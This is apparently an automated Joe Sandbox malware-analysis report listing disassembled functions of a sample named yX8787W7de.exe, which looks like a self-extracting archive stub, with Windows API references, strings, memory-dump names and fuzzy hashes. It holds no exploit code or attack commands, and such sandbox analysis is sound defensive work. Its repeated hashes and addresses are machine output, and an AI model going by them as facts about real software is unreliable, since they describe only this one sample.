Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 3d08f3b473235f1cb9a18df317cb4369148cd8bfa94ecee55aa8adb3c15426cc
Instruction ID: 69fb119af33514f0d70d8c538ae7cba7e1d724e76f7faa497a1d896c44edc953
Opcode Fuzzy Hash: 3d08f3b473235f1cb9a18df317cb4369148cd8bfa94ecee55aa8adb3c15426cc
Instruction Fuzzy Hash: C231CF71145342AFE301DF20AC4AFAB7FACEB82B08F040508F661965E0EB648B488777

Uniqueness

Uniqueness Score: -1.00%

Function 0013D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0013D7AE
ShellExecuteExW.SHELL32(?), ref: 0013D8DE
ShowWindow.USER32(?,00000000), ref: 0013D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0013D959
CloseHandle.KERNEL32(?), ref: 0013D97F
ShowWindow.USER32(?,00000001), ref: 0013D9E1

Strings

.inf, xrefs: 0013D89A
.exe, xrefs: 0013D989

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: d78635a03e8f02e13379421128406bf5179a09cacf433765317b1fae7853c43d
Instruction ID: 3d4d414d8c3b3e4d66d811d1f5284414d573c32c9de72907680e2ffd3bebba60
Opcode Fuzzy Hash: d78635a03e8f02e13379421128406bf5179a09cacf433765317b1fae7853c43d
Instruction Fuzzy Hash: 4A51D670508380AADB319F24F844BABBBF5AF51748F08045EF9C5971A1EB719EC9CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0014A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00145695,00145695,?,?,?,0014ABAC,00000001,00000001,2DE85006), ref: 0014A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0014ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0014AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0014AB35
__freea.LIBCMT ref: 0014AB42

Part of subcall function 00148E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014CA2C,00000000,?,00146CBE,?,00000008,?,001491E0,?,?,?), ref: 00148E38

__freea.LIBCMT ref: 0014AB4B
__freea.LIBCMT ref: 0014AB70

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: c22e61f9160d804dcd64bb4da8cd7652d2e1c4e9254bdfca301162efda2e4513
Instruction ID: f15d9e43d9ac9d1beb3d1481bcd6fac7e190f3ea30cbbbe4b90abefcb2dfed76
Opcode Fuzzy Hash: c22e61f9160d804dcd64bb4da8cd7652d2e1c4e9254bdfca301162efda2e4513
Instruction Fuzzy Hash: EA51D372650216AFDB258F64CC41EBFB7AAEF54750FA64628FC04D7160EB34DC40C692

Uniqueness

Uniqueness Score: -1.00%

Function 00143B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00143C35,?,?,00182088,00000000,?,00143D60,00000004,InitializeCriticalSectionEx,00156394,InitializeCriticalSectionEx,00000000), ref: 00143C03

Strings

api-ms-, xrefs: 00143BC3

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 1c1968cf8dc61e6e258cd6b21bf0560b2d9668aaf95de35075955f9884eb0527
Instruction ID: f269a5a9bc1396853341465a42f19a50b2dfeaa3f5917e8eb241ebcc4c2536ae
Opcode Fuzzy Hash: 1c1968cf8dc61e6e258cd6b21bf0560b2d9668aaf95de35075955f9884eb0527
Instruction Fuzzy Hash: 0E11C631A45721EBDB228B689C41B5A77A4DF017B1F250211F935FB2E0E771EF408AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0013AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0013081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00130836
Part of subcall function 0013081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0012F2D8,Crypt32.dll,00000000,0012F35C,?,?,0012F33E,?,?,?), ref: 00130858

OleInitialize.OLE32(00000000), ref: 0013AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0013AC66
SHGetMalloc.SHELL32(00168438), ref: 0013AC70

Strings

riched20.dll, xrefs: 0013AC1E
3To, xrefs: 0013AC47

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: 376e1778ddd8cb50a7fa3fa964a30bd7a0cf27fb2e35ea99e115698be3fd0761
Instruction ID: 37e1b49cb0830a81815bb03aafb7b0e7e3f1350ef3093a27089ce0b5569f3a21
Opcode Fuzzy Hash: 376e1778ddd8cb50a7fa3fa964a30bd7a0cf27fb2e35ea99e115698be3fd0761
Instruction Fuzzy Hash: 1AF01DB1D00209ABCB10AFA9D8499EFFFFCEF94B04F04415AE815E2241DBB457458FA1

Uniqueness

Uniqueness Score: -1.00%

Function 001298E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00127760,?,00000005,?,00000011), ref: 0012995F
GetLastError.KERNEL32(?,?,00127760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0012996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00127760,?,00000005,?), ref: 001299A2
GetLastError.KERNEL32(?,?,00127760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001299AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00127760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001299F9

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 0e5e493ef690be1d8d66a912e43c571a1e6c5ce28991df560169b320c37c8e0c
Instruction ID: 87a2eae3eea3b7e770effdc5121cf3738d09452b0f3ca3b1d65c00b60f991e13
Opcode Fuzzy Hash: 0e5e493ef690be1d8d66a912e43c571a1e6c5ce28991df560169b320c37c8e0c
Instruction Fuzzy Hash: 4F311330544365AFEB209B28EC46B9ABB94BB04334F100B1DF9A1961D0D3A4A9A4CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0013B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013B58A
IsDialogMessageW.USER32(00010440,?), ref: 0013B59E
TranslateMessage.USER32(?), ref: 0013B5AC
DispatchMessageW.USER32(?), ref: 0013B5B6

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 7984170859838513faa9c2e0d1d497d63b6cbb65a45b67a16710ce8b72059391
Instruction ID: 04ec4d39925cc8e7b3171d40ac4a81b584aef681f12ef33f5f49664c2fff0b14
Opcode Fuzzy Hash: 7984170859838513faa9c2e0d1d497d63b6cbb65a45b67a16710ce8b72059391
Instruction Fuzzy Hash: 53F0B771A0122AABCB20ABE6EC8CDDF7FACEF05A917044515B919D2410EB74D645CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00147F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\yX8787W7de.exe,00000104), ref: 00147FAE
_free.LIBCMT ref: 00148079
_free.LIBCMT ref: 00148083

Strings

C:\Users\user\Desktop\yX8787W7de.exe, xrefs: 00147FA5, 00147FAC, 00147FDB, 00148013

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\yX8787W7de.exe
API String ID: 2506810119-207832400
Opcode ID: 715114dfe7721a309c396e928b5d25234327f2a18f7c878ccdd6af9411878129
Instruction ID: cb940d646f0207c0dccb68d933a34dc76f1931ef7c8e0c653dee8224b3f864c9
Opcode Fuzzy Hash: 715114dfe7721a309c396e928b5d25234327f2a18f7c878ccdd6af9411878129
Instruction Fuzzy Hash: 0831A3B1A04218AFDB22DF99DC85D9EBBFCEF95310F204066F90497261DB718E85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0013ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0013ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0013ABF9

Part of subcall function 00131FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0012C116,00000000,.exe,?,?,00000800,?,?,?,00138E3C), ref: 00131FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0013ABE9

Strings

EDIT, xrefs: 0013ABCD, 0013ABD8, 0013ABE5

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: f139489d5af3c7705073d472815e98aabbb51081daed75ceb63e91d190d5e746
Instruction ID: 6e016364f4cc663d45db0409b96721bd1b29869493ac0f73af2f1b1beaf82548
Opcode Fuzzy Hash: f139489d5af3c7705073d472815e98aabbb51081daed75ceb63e91d190d5e746
Instruction Fuzzy Hash: 1FF08C326002287BDB2096249C09F9BB6AC9F46F40F884021BE45B6184DB61EF8986B6

Uniqueness

Uniqueness Score: -1.00%

Function 0013DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0013DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0013DC30

Strings

sfxcmd, xrefs: 0013DBEF
sfxpar, xrefs: 0013DC2B

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 438c7027a1600f07de09f43012488d5c828a0afba5dacc8d7c7750bf0d0b365b
Instruction ID: 6741e1d1214bb995a030e8f5759e0a35ac9c19dc54a80652c45b1550473c80cb
Opcode Fuzzy Hash: 438c7027a1600f07de09f43012488d5c828a0afba5dacc8d7c7750bf0d0b365b
Instruction Fuzzy Hash: 69F0EC72414724EBCB211FA5AC46BFA3F98BF14B82F040415FD859A051E7B08980D6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00129785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00129795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 001297AD
GetLastError.KERNEL32 ref: 001297DF
GetLastError.KERNEL32 ref: 001297FE

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 7a61849feda338f384cca6f75378b90ebdfa2bc8e9f8dc4190cad1a6470d677b
Instruction ID: 575069fda6b77277ae17e85a2e9eb53f3704c39f2c81cd4d8e5264b994514e85
Opcode Fuzzy Hash: 7a61849feda338f384cca6f75378b90ebdfa2bc8e9f8dc4190cad1a6470d677b
Instruction Fuzzy Hash: EA110430910328EBDF205F2CEC04A6A37A9FF02361F148929F42ACA590D770CEA4DF61

Uniqueness

Uniqueness Score: -1.00%

Function 0014AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00143F73,00000000,00000000,?,0014ACDB,00143F73,00000000,00000000,00000000,?,0014AED8,00000006,FlsSetValue), ref: 0014AD66
GetLastError.KERNEL32(?,0014ACDB,00143F73,00000000,00000000,00000000,?,0014AED8,00000006,FlsSetValue,00157970,FlsSetValue,00000000,00000364,?,001498B7), ref: 0014AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0014ACDB,00143F73,00000000,00000000,00000000,?,0014AED8,00000006,FlsSetValue,00157970,FlsSetValue,00000000), ref: 0014AD80

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 384f679cb09f0e5a7083904b9514c0451ffcec4b1be17762beb36771a6125e44
Instruction ID: 4aacd98a2b9d96b9464768dc10b7d510b5b5367c212af147c8061c3b4ebd6153
Opcode Fuzzy Hash: 384f679cb09f0e5a7083904b9514c0451ffcec4b1be17762beb36771a6125e44
Instruction Fuzzy Hash: 49012B36A81332EBC7224BA8DC44A57BB5CEF457B3B930624F926D79B0D720D941C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00129F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0012D343,00000001,?,?,?,00000000,0013551D,?,?,?), ref: 00129F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0013551D,?,?,?,?,?,00134FC7,?), ref: 00129FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0012D343,00000001,?,?), ref: 0012A011

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: d469c7a10afc2a35f93b5e95abf2741986ce47e2e50aa8437680a40facfd2163
Instruction ID: 5fb6021a680806e62e9f04e236c965d3a3d09eb1c32b64633ff2baca9f105c0f
Opcode Fuzzy Hash: d469c7a10afc2a35f93b5e95abf2741986ce47e2e50aa8437680a40facfd2163
Instruction Fuzzy Hash: 2531C231204325AFDB14CF24E918B6EBBA5FF84711F04091DF5519B290C775AD68CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0012A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0012C27E: _wcslen.LIBCMT ref: 0012C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0012A175,?,00000001,00000000,?,?), ref: 0012A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0012A175,?,00000001,00000000,?,?), ref: 0012A30C
GetLastError.KERNEL32(?,?,?,?,0012A175,?,00000001,00000000,?,?), ref: 0012A329

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 9016961accf53fd8268860bd31d1d927a77974d420a464a570bd3b8fd968fa44
Instruction ID: a5df8bec6848d479e348951240a619bea5512900defb165f2cb63bd6c77b3b9c
Opcode Fuzzy Hash: 9016961accf53fd8268860bd31d1d927a77974d420a464a570bd3b8fd968fa44
Instruction Fuzzy Hash: 6A01B135200330ABEF21EB756C49BEE3398AF1A781F844454F901E60C1DB64DAA1C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 0014B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0014B8B8

Strings

, xrefs: 0014B8FD

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 7e04cff7d5ffef87f54a29bd8ab6f0b11eee04666a399707817bbd3b932bd36e
Instruction ID: 93e93877cc26ad6c263d9e55ea4c72e63e356eee5584876d1db257904515fbb3
Opcode Fuzzy Hash: 7e04cff7d5ffef87f54a29bd8ab6f0b11eee04666a399707817bbd3b932bd36e
Instruction Fuzzy Hash: 944106B090838C9ADF258E24CCD4BF6BBA9EB55308F1404ECE69A87152D335EA458B60

Uniqueness

Uniqueness Score: -1.00%

Function 0014AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0014AFDD

Strings

LCMapStringEx, xrefs: 0014AF7D, 0014AF87

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
